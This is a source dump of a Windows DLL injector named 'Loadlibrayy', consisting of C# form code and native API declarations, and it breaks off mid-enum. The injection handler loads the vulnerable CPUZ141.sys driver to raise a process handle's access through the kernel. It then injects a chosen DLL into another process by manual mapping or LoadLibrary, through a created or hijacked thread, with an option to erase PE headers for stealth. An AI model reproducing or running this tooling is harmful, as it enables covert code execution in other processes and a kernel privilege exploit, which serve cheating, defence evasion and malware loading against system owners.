System.Drawing.Size(112, 43); this.groupBox3.TabIndex = 4; this.groupBox3.TabStop = false; this.groupBox3.Text = "Thread Type"; // // TypeCombo // this.TypeCombo.BackColor = System.Drawing.SystemColors.Control; this.TypeCombo.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; this.TypeCombo.FlatStyle = System.Windows.Forms.FlatStyle.Flat; this.TypeCombo.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(192)))), ((int)(((byte)(64)))), ((int)(((byte)(0))))); this.TypeCombo.FormattingEnabled = true; this.TypeCombo.Items.AddRange(new object[] { "Create", "Hijack"}); this.TypeCombo.Location = new System.Drawing.Point(4, 15); this.TypeCombo.Name = "TypeCombo"; this.TypeCombo.Size = new System.Drawing.Size(103, 21); this.TypeCombo.TabIndex = 0; this.TypeCombo.TabStop = false; // // NewInjectionForm // this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.ClientSize = new System.Drawing.Size(265, 156); this.Controls.Add(this.groupBox3); this.Controls.Add(this.CreditLabel); this.Controls.Add(this.SelectButton); this.Controls.Add(this.groupBox2); this.Controls.Add(this.groupBox1); this.Controls.Add(this.InjectButton); this.Font = new System.Drawing.Font("Consolas", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedToolWindow; this.MaximizeBox = false; this.Name = "NewInjectionForm"; this.Opacity = 0D; this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; this.Text = "Loadlibrayy "; this.Load += new System.EventHandler(this.NewInjectionForm_Load); this.groupBox1.ResumeLayout(false); this.groupBox1.PerformLayout(); this.groupBox2.ResumeLayout(false); this.groupBox3.ResumeLayout(false); this.ResumeLayout(false); this.PerformLayout(); } #endregion private System.Windows.Forms.Button InjectButton; private System.Windows.Forms.GroupBox groupBox1; private System.Windows.Forms.GroupBox groupBox2; private System.Windows.Forms.Button SelectButton; private System.Windows.Forms.Label CreditLabel; private System.Windows.Forms.CheckBox EraseHeadersCheckbox; private System.Windows.Forms.CheckBox ElevateHandleCheckbox; private System.Windows.Forms.ComboBox ModeCombo; private System.Windows.Forms.GroupBox groupBox3; private System.Windows.Forms.ComboBox TypeCombo; private System.Windows.Forms.CheckBox LinkModuleCheckbox; } } ================================================ FILE: Forms/NewInjectionForm.cs ================================================ using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Diagnostics; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using DriverExploits; using Loadlibrayy.Injection; using Loadlibrayy.Logger; namespace Loadlibrayy.Forms { public partial class NewInjectionForm : Form { private Process g_SelectedProcess; public NewInjectionForm() { InitializeComponent(); } private void InjectButton_Click(object sender, EventArgs e) { // SANITY CHECKS if (g_SelectedProcess == null) { Log.ShowError("Select a process!", "Error"); return; } OpenFileDialog fileDialog = new OpenFileDialog() { Filter = "Dynamic Link Library|*.dll", Multiselect = false }; if (fileDialog.ShowDialog() != DialogResult.OK) return; // LOAD EXPLOITABLE DRIVER bool driverLoaded = false; if (ElevateHandleCheckbox.Checked) { if (!(driverLoaded = ElevateHandle.Driver.Load())) { Log.ShowError("CPUZ141.sys failed to load", "lol fuck"); return; } ElevateHandle.UpdateDynamicData(); // UPDATE KERNEL OFFSETS ElevateHandle.Attach(); // ATTACH TO CURRENT PROCESS ElevateHandle.Elevate((ulong)g_SelectedProcess.Handle, 0x1fffff); } InjectionOptions options = new InjectionOptions() { ElevateHandle = ElevateHandleCheckbox.Checked, EraseHeaders = EraseHeadersCheckbox.Checked, CreateLoaderReference = LinkModuleCheckbox.Checked, LoaderImagePath = fileDialog.FileName }; ExecutionType executionType = 0; switch (TypeCombo.SelectedIndex) { case 0: executionType = ExecutionType.CreateThread; break; case 1: executionType = ExecutionType.HijackThread; break; } IInjectionMethod injectionMethod = null; switch (ModeCombo.SelectedIndex) { case 0: // MANUAL MAP injectionMethod = new ManualMapInjection(g_SelectedProcess, executionType, options); break; case 1: // LOAD LIBRARY injectionMethod = new LoadLibraryInjection(g_SelectedProcess, executionType, options); break; } injectionMethod.InjectImage(fileDialog.FileName); if (driverLoaded) ElevateHandle.Driver.Unload(); } private void SelectButton_Click(object sender, EventArgs e) { TaskListForm taskListForm = new TaskListForm(); taskListForm.ShowDialog(); if (taskListForm.SelectedProcess != null) g_SelectedProcess = taskListForm.SelectedProcess; } private void NewInjectionForm_Load(object sender, EventArgs e) { this.ModeCombo.SelectedIndex = 0; this.TypeCombo.SelectedIndex = 0; Random random = new Random(); // FADE FORM Timer fadeTimer = new Timer(); fadeTimer.Tick += delegate { this.Opacity += 0.1; this.CreditLabel.ForeColor = Color.FromArgb((this.CreditLabel.ForeColor.R + 10) % 255, 0, 0); }; fadeTimer.Start(); } } } ================================================ FILE: Forms/NewInjectionForm.resx ================================================  text/microsoft-resx 2.0 System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ================================================ FILE: Forms/TaskList.Designer.cs ================================================ namespace Loadlibrayy.Forms { partial class TaskListForm { /// /// Required designer variable. /// private System.ComponentModel.IContainer components = null; /// /// Clean up any resources being used. /// /// true if managed resources should be disposed; otherwise, false. protected override void Dispose(bool disposing) { if (disposing && (components != null)) { components.Dispose(); } base.Dispose(disposing); } #region Windows Form Designer generated code /// /// Required method for Designer support - do not modify /// the contents of this method with the code editor. /// private void InitializeComponent() { this.listAllTasks = new System.Windows.Forms.ListView(); this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.buttonSelectProcess = new System.Windows.Forms.Button(); this.buttonRefresh = new System.Windows.Forms.Button(); this.SuspendLayout(); // // listAllTasks // this.listAllTasks.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { this.columnHeader1, this.columnHeader2}); this.listAllTasks.GridLines = true; this.listAllTasks.Location = new System.Drawing.Point(12, 12); this.listAllTasks.Name = "listAllTasks"; this.listAllTasks.Size = new System.Drawing.Size(260, 203); this.listAllTasks.TabIndex = 0; this.listAllTasks.UseCompatibleStateImageBehavior = false; this.listAllTasks.View = System.Windows.Forms.View.Details; // // columnHeader1 // this.columnHeader1.Text = "Id"; this.columnHeader1.Width = 109; // // columnHeader2 // this.columnHeader2.Text = "Name"; this.columnHeader2.Width = 146; // // buttonSelectProcess // this.buttonSelectProcess.Location = new System.Drawing.Point(64, 221); this.buttonSelectProcess.Name = "buttonSelectProcess"; this.buttonSelectProcess.Size = new System.Drawing.Size(75, 23); this.buttonSelectProcess.TabIndex = 1; this.buttonSelectProcess.Text = "Select"; this.buttonSelectProcess.UseVisualStyleBackColor = true; this.buttonSelectProcess.Click += new System.EventHandler(this.buttonSelectProcess_Click); // // buttonRefresh // this.buttonRefresh.Location = new System.Drawing.Point(145, 221); this.buttonRefresh.Name = "buttonRefresh"; this.buttonRefresh.Size = new System.Drawing.Size(75, 23); this.buttonRefresh.TabIndex = 2; this.buttonRefresh.Text = "Refresh"; this.buttonRefresh.UseVisualStyleBackColor = true; this.buttonRefresh.Click += new System.EventHandler(this.buttonRefresh_Click); // // TaskListForm // this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.ClientSize = new System.Drawing.Size(284, 261); this.Controls.Add(this.buttonRefresh); this.Controls.Add(this.buttonSelectProcess); this.Controls.Add(this.listAllTasks); this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedToolWindow; this.Name = "TaskListForm"; this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; this.Text = "Task List"; this.Load += new System.EventHandler(this.TaskListForm_Load); this.ResumeLayout(false); } #endregion private System.Windows.Forms.ListView listAllTasks; private System.Windows.Forms.Button buttonSelectProcess; private System.Windows.Forms.ColumnHeader columnHeader1; private System.Windows.Forms.ColumnHeader columnHeader2; private System.Windows.Forms.Button buttonRefresh; } } ================================================ FILE: Forms/TaskList.cs ================================================ using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Diagnostics; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; namespace Loadlibrayy.Forms { public partial class TaskListForm : Form { public Process SelectedProcess { get; set; } public TaskListForm() { InitializeComponent(); } private void TaskListForm_Load(object sender, EventArgs e) => UpdateTaskList(); private void buttonRefresh_Click(object sender, EventArgs e) => UpdateTaskList(); private void buttonSelectProcess_Click(object sender, EventArgs e) { SelectedProcess = Process.GetProcessById(Convert.ToInt32(listAllTasks.SelectedItems[0].Text)); this.Close(); } private void UpdateTaskList() { listAllTasks.Items.Clear(); foreach (var process in Process.GetProcesses().OrderBy(x => x.ProcessName)) { listAllTasks.Items.Add( new ListViewItem(new string[] { process.Id.ToString(), process.ProcessName }) ); } } } } ================================================ FILE: Forms/TaskList.resx ================================================  text/microsoft-resx 2.0 System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ================================================ FILE: Helpers/Logger.cs ================================================ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; namespace Loadlibrayy.Logger { public static class Log { public static void LogGeneral(string general) => Console.WriteLine($"[+] {general}"); public static void LogInfo(string information) => Console.WriteLine($"[?] {information}"); public static void LogVariable(string variableName, T variable) => Console.WriteLine($"[?] {variableName} - {variable}"); public static void LogError(string error) => Console.WriteLine($"[!] {error}"); public static void ShowWarning(string message, string title) => MessageBox.Show(message, title, MessageBoxButtons.OK, MessageBoxIcon.Warning); public static void ShowInformation(string message, string title) => MessageBox.Show(message, title, MessageBoxButtons.OK, MessageBoxIcon.Information); public static void ShowError(string message, string title) => MessageBox.Show(message, title, MessageBoxButtons.OK, MessageBoxIcon.Error); } } ================================================ FILE: Helpers/Natives.cs ================================================ using System; using System.Collections.Generic; using System.ComponentModel; using System.Diagnostics; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Threading.Tasks; namespace Loadlibrayy.Natives { public static class NTM { public static Random RandomEngine = new Random(); public static ulong GetModuleFunction(string moduleName, string functionName) => NT.GetProcAddress(NT.GetModuleHandle(moduleName), functionName); public static void WaitForThread(ulong threadHandle) => NT.WaitForSingleObject(threadHandle, uint.MaxValue); public static ulong OpenThread(NT.ThreadAccess threadAccess, int threadId) => NT.OpenThread(threadAccess, false, threadId); public static uint GetThreadExitCode(ulong threadHandle) { NT.GetExitCodeThread(threadHandle, out uint exitCode); return exitCode; } public static string GetModuleBaseName(IntPtr processHandle, ulong moduleHandle) { StringBuilder name = new StringBuilder(1024); NT.GetModuleBaseName(processHandle, moduleHandle, name, 1024); return name.ToString(); } } public static unsafe class NT { #region Functions [DllImport("ntdll.dll", SetLastError = true)] public static extern uint NtCreateSection( out ulong SectionHandle, ACCESS_MASK DesiredAccess, int ObjectAttributes, out long MaximumSize, NT.MemoryProtection SectionPageProtection, uint AllocationAttributes, ulong FileHandle); [DllImport("kernel32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool CloseHandle(ulong hObject); [DllImport("ntdll.dll", SetLastError = true)] public static extern int NtMapViewOfSection( ulong SectionHandle, IntPtr ProcessHandle, ref ulong BaseAddress, ulong ZeroBits, uint CommitSize, long SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, NT.MemoryProtection Win32Protect); [DllImport("ntdll.dll", SetLastError = true)] public static extern int NtQueryInformationProcess(IntPtr processHandle, int processInformationClass, void* processInformation, int processInformationLength, IntPtr returnLength); [DllImport("ntdll.dll", SetLastError = true)] public static extern uint NtUnmapViewOfSection(IntPtr ProcessHandle, ulong BaseAddress); [DllImport("kernel32.dll")] public static extern int VirtualQueryEx(IntPtr hProcess, ulong lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength); [DllImport("psapi.dll", CallingConvention = CallingConvention.StdCall, SetLastError = true)] public static extern int EnumProcessModules(IntPtr hProcess, [Out] ulong lphModule, uint cb, out uint lpcbNeeded); [DllImport("psapi.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode)] public static extern uint GetModuleFileNameEx(IntPtr hProcess, ulong hModule, [Out] StringBuilder lpBaseName, uint nSize); [DllImport("psapi.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode)] public static extern uint GetModuleBaseName(IntPtr hProcess, ulong hModule, [Out] StringBuilder lpBaseName, uint nSize); [DllImport("kernel32.dll", SetLastError = true)] public static extern ulong OpenProcess(uint processAccess, bool bInheritHandle, uint processId); [DllImport("ntdll.dll", SetLastError = true)] public static extern uint NtQuerySystemInformation(uint InfoClass, ulong Info, uint Size, out uint Length); [DllImport("ntdll.dll", SetLastError = true)] public static extern uint RtlGetVersion(_OSVERSIONINFOEXW* lpVersionInformation); [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] public static extern ulong LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); [DllImport("kernel32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool FreeLibrary(ulong hModule); [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] public static extern ulong GetProcAddress(ulong hModule, string procName); [DllImport("kernel32", SetLastError = true)] public static extern ulong GetProcAddress(ulong hModule, ulong procName); [DllImport("kernel32.dll", CharSet = CharSet.Auto)] public static extern ulong GetModuleHandle(string lpModuleName); [DllImport("kernel32.dll", SetLastError = true)] public static extern ulong CreateRemoteThread(IntPtr hProcess, ulong lpThreadAttributes, uint dwStackSize, ulong lpStartAddress, ulong lpParameter, uint dwCreationFlags, out ulong lpThreadId); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] public static extern ulong VirtualAllocEx(IntPtr hProcess, ulong lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect); [DllImport("kernel32.dll")] public static extern bool VirtualProtectEx(IntPtr hProcess, ulong lpAddress, int dwSize, NT.MemoryProtection flNewProtect, out NT.MemoryProtection lpflOldProtect); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] public static extern bool VirtualFreeEx(IntPtr hProcess, ulong lpAddress, int dwSize, AllocationType dwFreeType); [DllImport("kernel32.dll")] public static extern bool ReadProcessMemory(IntPtr hProcess, ulong lpBaseAddress, byte[] lpBuffer, int dwSize, int lpNumberOfBytesRead); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool WriteProcessMemory(IntPtr hProcess, ulong lpBaseAddress, byte[] lpBuffer, uint nSize, ulong lpNumberOfBytesWritten); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool GetExitCodeThread(ulong hThread, out uint lpExitCode); [DllImport("kernel32.dll", SetLastError = true)] public static extern uint WaitForSingleObject(ulong hHandle, uint dwMilliseconds); [DllImport("kernel32.dll", SetLastError = true)] public static extern ulong OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, int dwThreadId); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool GetThreadContext(ulong hThread, ref CONTEXT64 lpContext); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool SetThreadContext(ulong hThread, ref CONTEXT64 lpContext); [DllImport("kernel32.dll", SetLastError = true)] public static extern uint ResumeThread(ulong hThread); [DllImport("kernel32.dll", SetLastError = true)] public static extern uint SuspendThread(ulong hThread); #endregion #region Structs [StructLayout(LayoutKind.Sequential, Pack = 1)] public struct PROCESS_BASIC_INFORMATION { public ulong ExitStatus; public ulong PebBaseAddress; public ulong AffinityMask; public ulong BasePriority; public ulong UniqueProcessId; public ulong InheritedFromUniqueProcessId; public int Size { get { return Marshal.SizeOf(); } } } [StructLayout(LayoutKind.Sequential)] public struct _PEB { public fixed byte Reserved1[2]; public byte BeingDebugged; public fixed byte Reserved2[1]; public fixed byte Reserved3[2 * sizeof(ulong)]; public ulong Ldr; } [StructLayout(LayoutKind.Sequential)] public struct _PEB_LDR_DATA { public uint Length; public byte Initialized; public ulong SsHandle; public _LIST_ENTRY InLoadOrderModuleList; public _LIST_ENTRY InMemoryOrderModuleList; public _LIST_ENTRY InInitializationOrderModuleList; public ulong EntryInProgress; } [StructLayout(LayoutKind.Sequential)] public struct UNICODE_STRING { public ushort Length; public ushort MaximumLength; public ulong Buffer; public UNICODE_STRING(string s) { Length = (ushort)(s.Length * 2); MaximumLength = (ushort)(Length + 2); Buffer = 0; } } [StructLayout(LayoutKind.Sequential)] public struct _LDR_DATA_TABLE_ENTRY { public _LIST_ENTRY InLoadOrderLinks; public _LIST_ENTRY InMemoryOrderLinks; public _LIST_ENTRY InInitializationOrderLinks; public ulong DllBase; public ulong EntryPoint; public ulong SizeOfImage; public UNICODE_STRING FullDllName; public UNICODE_STRING BaseDllName; public uint Flags; public ushort LoadCount; public ushort TlsIndex; public ulong Reserved4; public ulong CheckSum; public uint TimeDateStamp; public ulong EntryPointActivationContext; public ulong PatchInformation; public _LIST_ENTRY ForwarderLinks; public _LIST_ENTRY ServiceTagLinks; public _LIST_ENTRY StaticLinks; } [StructLayout(LayoutKind.Sequential)] public struct _LIST_ENTRY { public ulong Flink; public ulong Blink; } [StructLayout(LayoutKind.Sequential)] public struct IMAGE_BASE_RELOCATION { public uint VirtualAddress; public uint SizeOfBlock; } [StructLayout(LayoutKind.Sequential)] public struct IMAGE_IMPORT_DESCRIPTOR { public uint OriginalFirstThunk; public uint TimeDateStamp; public uint ForwarderChain; public uint Name; public uint FirstThunk; } [StructLayout(LayoutKind.Explicit)] public struct IMAGE_SECTION_HEADER { [FieldOffset(0)] public fixed sbyte Name[8]; [FieldOffset(8)] public UInt32 VirtualSize; [FieldOffset(12)] public UInt32 VirtualAddress; [FieldOffset(16)] public UInt32 SizeOfRawData; [FieldOffset(20)] public UInt32 PointerToRawData; [FieldOffset(24)] public UInt32 PointerToRelocations; [FieldOffset(28)] public UInt32 PointerToLinenumbers; [FieldOffset(32)] public UInt16 NumberOfRelocations; [FieldOffset(34)] public UInt16 NumberOfLinenumbers; [FieldOffset(36)] public DataSectionFlags Characteristics; public string SectionName { get { fixed (sbyte* nameBytes = Name) return new string(nameBytes); } } } [StructLayout(LayoutKind.Sequential)] public struct MEMORY_BASIC_INFORMATION { public ulong BaseAddress; public ulong AllocationBase; public uint AllocationProtect; public ulong RegionSize; public uint State; public uint Protect; public uint Type; } [StructLayout(LayoutKind.Explicit)] public struct IMAGE_DOS_HEADER { [FieldOffset(60)] public int e_lfanew; } [StructLayout(LayoutKind.Sequential)] public struct IMAGE_NT_HEADERS { public uint Signature; public IMAGE_FILE_HEADER FileHeader; public IMAGE_OPTIONAL_HEADER64 OptionalHeader; } public enum MachineType : ushort { Native = 0, I386 = 0x014c, Itanium = 0x0200, x64 = 0x8664 } public enum MagicType : ushort { IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10b, IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20b } public enum SubSystemType : ushort { IMAGE_SUBSYSTEM_UNKNOWN = 0, IMAGE_SUBSYSTEM_NATIVE = 1, IMAGE_SUBSYSTEM_WINDOWS_GUI = 2, IMAGE_SUBSYSTEM_WINDOWS_CUI = 3, IMAGE_SUBSYSTEM_POSIX_CUI = 7, IMAGE_SUBSYSTEM_WINDOWS_CE_GUI = 9, IMAGE_SUBSYSTEM_EFI_APPLICATION = 10, IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER = 11, IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER = 12, IMAGE_SUBSYSTEM_EFI_ROM = 13, IMAGE_SUBSYSTEM_XBOX = 14 } public enum DllCharacteristicsType : ushort { RES_0 = 0x0001, RES_1 = 0x0002, RES_2 = 0x0004, RES_3 = 0x0008, IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE = 0x0040, IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY = 0x0080, IMAGE_DLL_CHARACTERISTICS_NX_COMPAT = 0x0100, IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = 0x0200, IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400, IMAGE_DLLCHARACTERISTICS_NO_BIND = 0x0800, RES_4 = 0x1000, IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = 0x2000, IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE = 0x8000 } [StructLayout(LayoutKind.Explicit)] public struct IMAGE_OPTIONAL_HEADER64 { [FieldOffset(0)] public MagicType Magic; [FieldOffset(2)] public byte MajorLinkerVersion; [FieldOffset(3)] public byte MinorLinkerVersion; [FieldOffset(4)] public uint SizeOfCode; [FieldOffset(8)] public uint SizeOfInitializedData; [FieldOffset(12)] public uint SizeOfUninitializedData; [FieldOffset(16)] public uint AddressOfEntryPoint; [FieldOffset(20)] public uint BaseOfCode; [FieldOffset(24)] public ulong ImageBase; [FieldOffset(32)] public uint SectionAlignment; [FieldOffset(36)] public uint FileAlignment; [FieldOffset(40)] public ushort MajorOperatingSystemVersion; [FieldOffset(42)] public ushort MinorOperatingSystemVersion; [FieldOffset(44)] public ushort MajorImageVersion; [FieldOffset(46)] public ushort MinorImageVersion; [FieldOffset(48)] public ushort MajorSubsystemVersion; [FieldOffset(50)] public ushort MinorSubsystemVersion; [FieldOffset(52)] public uint Win32VersionValue; [FieldOffset(56)] public uint SizeOfImage; [FieldOffset(60)] public uint SizeOfHeaders; [FieldOffset(64)] public uint CheckSum; [FieldOffset(68)] public SubSystemType Subsystem; [FieldOffset(70)] public DllCharacteristicsType DllCharacteristics; [FieldOffset(72)] public ulong SizeOfStackReserve; [FieldOffset(80)] public ulong SizeOfStackCommit; [FieldOffset(88)] public ulong SizeOfHeapReserve; [FieldOffset(96)] public ulong SizeOfHeapCommit; [FieldOffset(104)] public uint LoaderFlags; [FieldOffset(108)] public uint NumberOfRvaAndSizes; [FieldOffset(112)] public IMAGE_DATA_DIRECTORY ExportTable; [FieldOffset(120)] public IMAGE_DATA_DIRECTORY ImportTable; [FieldOffset(128)] public IMAGE_DATA_DIRECTORY ResourceTable; [FieldOffset(136)] public IMAGE_DATA_DIRECTORY ExceptionTable; [FieldOffset(144)] public IMAGE_DATA_DIRECTORY CertificateTable; [FieldOffset(152)] public IMAGE_DATA_DIRECTORY BaseRelocationTable; [FieldOffset(160)] public IMAGE_DATA_DIRECTORY Debug; [FieldOffset(168)] public IMAGE_DATA_DIRECTORY Architecture; [FieldOffset(176)] public IMAGE_DATA_DIRECTORY GlobalPtr; [FieldOffset(184)] public IMAGE_DATA_DIRECTORY TLSTable; [FieldOffset(192)] public IMAGE_DATA_DIRECTORY LoadConfigTable; [FieldOffset(200)] public IMAGE_DATA_DIRECTORY BoundImport; [FieldOffset(208)] public IMAGE_DATA_DIRECTORY IAT; [FieldOffset(216)] public IMAGE_DATA_DIRECTORY DelayImportDescriptor; [FieldOffset(224)] public IMAGE_DATA_DIRECTORY CLRRuntimeHeader; [FieldOffset(232)] public IMAGE_DATA_DIRECTORY Reserved; } [StructLayout(LayoutKind.Sequential)] public struct IMAGE_FILE_HEADER { public UInt16 Machine; public UInt16 NumberOfSections; public UInt32 TimeDateStamp; public UInt32 PointerToSymbolTable; public UInt32 NumberOfSymbols; public UInt16 SizeOfOptionalHeader; public UInt16 Characteristics; } [StructLayout(LayoutKind.Sequential)] public struct IMAGE_DATA_DIRECTORY { public uint VirtualAddress; public uint Size; } [StructLayout(LayoutKind.Sequential)] public struct _OSVERSIONINFOEXW { public uint dwOSVersionInfoSize; public uint dwMajorVersion; public uint dwMinorVersion; public uint dwBuildNumber; public uint dwPlatformId; public fixed byte szCSDVersion[128 * 2/*WCHAR*/]; // Maintenance string for PSS usage public ushort wServicePackMajor; public ushort wServicePackMinor; public ushort wSuiteMask; public byte wProductType; public byte wReserved; } [StructLayout(LayoutKind.Sequential)] public struct _HANDLE_TABLE_ENTRY { public ulong Object; public ulong GrantedAccess; } [StructLayout(LayoutKind.Sequential)] public struct ProcessContext { public uint ProcessId; public ulong DirectoryBase; public ulong KernelEntry; } [StructLayout(LayoutKind.Sequential)] public struct _RTL_PROCESS_MODULES { public uint NumberOfModules; public _RTL_PROCESS_MODULE_INFORMATION Modules; } [StructLayout(LayoutKind.Sequential)] public struct _RTL_PROCESS_MODULE_INFORMATION { public void* Section; public void* MappedBase; public void* ImageBase; public uint ImageSize; public uint Flags; public ushort LoadOrderIndex; public ushort InitOrderIndex; public ushort LoadCount; public ushort OffsetToFileName; public fixed sbyte FullPathName[256]; } [StructLayout(LayoutKind.Sequential)] public struct M128A { public ulong High; public long Low; public override string ToString() { return string.Format("High:{0}, Low:{1}", this.High, this.Low); } } [StructLayout(LayoutKind.Sequential, Pack = 16)] public struct XSAVE_FORMAT64 { public ushort ControlWord; public ushort StatusWord; public byte TagWord; public byte Reserved1; public ushort ErrorOpcode; public uint ErrorOffset; public ushort ErrorSelector; public ushort Reserved2; public uint DataOffset; public ushort DataSelector; public ushort Reserved3; public uint MxCsr; public uint MxCsr_Mask; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)] public M128A[] FloatRegisters; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] public M128A[] XmmRegisters; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)] public byte[] Reserved4; } [StructLayout(LayoutKind.Sequential, Pack = 16)] public struct CONTEXT64 { public ulong P1Home; public ulong P2Home; public ulong P3Home; public ulong P4Home; public ulong P5Home; public ulong P6Home; public CONTEXT_FLAGS ContextFlags; public uint MxCsr; public ushort SegCs; public ushort SegDs; public ushort SegEs; public ushort SegFs; public ushort SegGs; public ushort SegSs; public uint EFlags; public ulong Dr0; public ulong Dr1; public ulong Dr2; public ulong Dr3; public ulong Dr6; public ulong Dr7; public ulong Rax; public ulong Rcx; public ulong Rdx; public ulong Rbx; public ulong Rsp; public ulong Rbp; public ulong Rsi; public ulong Rdi; public ulong R8; public ulong R9; public ulong R10; public ulong R11; public ulong R12; public ulong R13; public ulong R14; public ulong R15; public ulong Rip; public XSAVE_FORMAT64 DUMMYUNIONNAME; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)] public M128A[] VectorRegister; public ulong VectorControl; public ulong DebugControl; public ulong LastBranchToRip; public ulong LastBranchFromRip; public ulong LastExceptionToRip; public ulong LastExceptionFromRip; } #endregion #region Flags [Flags] public enum DataSectionFlags : uint { /// /// Reserved for future use. /// TypeReg = 0x00000000, /// /// Reserved for future use. /// TypeDsect = 0x00000001, /// /// Reserved for future use. /// TypeNoLoad = 0x00000002, /// /// Reserved for future use. /// TypeGroup = 0x00000004, /// /// The section should not be padded to the next boundary. This flag is obsolete and is replaced by IMAGE_SCN_ALIGN_1BYTES. This is valid only for object files. /// TypeNoPadded = 0x00000008, /// /// Reserved for future use. /// TypeCopy = 0x00000010, /// /// The section contains executable code. /// ContentCode = 0x00000020, /// /// The section contains initialized data. /// ContentInitializedData = 0x00000040, /// /// The section contains uninitialized data. /// ContentUninitializedData = 0x00000080, /// /// Reserved for future use. /// LinkOther = 0x00000100, /// /// The section contains comments or other information. The .drectve section has this type. This is valid for object files only. /// LinkInfo = 0x00000200, /// /// Reserved for future use. /// TypeOver = 0x00000400, /// /// The section will not become part of the image. This is valid only for object files. /// LinkRemove = 0x00000800, /// /// The section contains COMDAT data. For more information, see section 5.5.6, COMDAT Sections (Object Only). This is valid only for object files. /// LinkComDat = 0x00001000, /// /// Reset speculative exceptions handling bits in the TLB entries for this section. /// NoDeferSpecExceptions = 0x00004000, /// /// The section contains data referenced through the global pointer (GP). /// RelativeGP = 0x00008000, /// /// Reserved for future use. /// MemPurgeable = 0x00020000, /// /// Reserved for future use. /// Memory16Bit = 0x00020000, /// /// Reserved for future use. /// MemoryLocked = 0x00040000, /// /// Reserved for future use. /// MemoryPreload = 0x00080000, /// /// Align data on a 1-byte boundary. Valid only for object files. /// Align1Bytes = 0x00100000, /// /// Align data on a 2-byte boundary. Valid only for object files. /// Align2Bytes = 0x00200000, /// /// Align data on a 4-byte boundary. Valid only for object files. /// Align4Bytes = 0x00300000, /// /// Align data on an 8-byte boundary. Valid only for object files. /// Align8Bytes = 0x00400000, /// /// Align data on a 16-byte boundary. Valid only for object files. /// Align16Bytes = 0x00500000, /// /// Align data on a 32-byte boundary. Valid only for object files. /// Align32Bytes = 0x00600000, /// /// Align data on a 64-byte boundary. Valid only for object files. /// Align64Bytes = 0x00700000, /// /// Align data on a 128-byte boundary. Valid only for object files. /// Align128Bytes = 0x00800000, /// /// Align data on a 256-byte boundary. Valid only for object files. /// Align256Bytes = 0x00900000, /// /// Align data on a 512-byte boundary. Valid only for object files. /// Align512Bytes = 0x00A00000, /// /// Align data on a 1024-byte boundary. Valid only for object files. /// Align1024Bytes = 0x00B00000, /// /// Align data on a 2048-byte boundary. Valid only for object files. /// Align2048Bytes = 0x00C00000, /// /// Align data on a 4096-byte boundary. Valid only for object files. /// Align4096Bytes = 0x00D00000, /// /// Align data on an 8192-byte boundary. Valid only for object files. /// Align8192Bytes = 0x00E00000, /// /// The section contains extended relocations. /// LinkExtendedRelocationOverflow = 0x01000000, /// /// The section can be discarded as needed. /// MemoryDiscardable = 0x02000000, /// /// The section cannot be cached. /// MemoryNotCached = 0x04000000, /// /// The section is not pageable. /// 